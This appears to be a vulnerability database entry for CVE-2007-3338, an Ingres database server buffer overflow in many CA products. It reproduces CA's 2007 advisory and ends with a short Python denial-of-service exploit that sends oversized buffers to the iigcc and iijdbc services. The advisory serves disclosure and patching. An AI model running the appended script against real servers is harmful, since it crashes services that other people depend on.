ID

VAR-200706-0399

CVE

CVE-2007-3338

TITLE

plural CA Product Ingres database server Vulnerable to stack-based buffer overflow

DESCRIPTION

Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities CA Vuln ID (CAID): 35450, 35451, 35452, 35453 CA Advisory Date: 2007-06-21 Reported By: NGSSoftware, and iDefense Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected. 1) Ingres controllable pointer overwrite vulnerability (reported by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450] Description: An unauthenticated attacker can potentially execute arbitrary code within the context of the database server. 3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user. 4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten. 5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. 6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. 7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022. Mitigating Factors: None Severity: CA has given these vulnerabilities a cumulative High risk rating. Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1 Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms. Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp Workaround: None References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 # Notes: Fixed in the last version. # please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com> import socket import sys if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>" print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3] if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) payload += "\x42" * 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data) print service + " crashed"

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

buffer overflow

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

iDEFENSEChris Anley※ chris@ngssoftware.com

SOURCES

LAST UPDATE DATE

2023-12-18T12:46:47.252000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE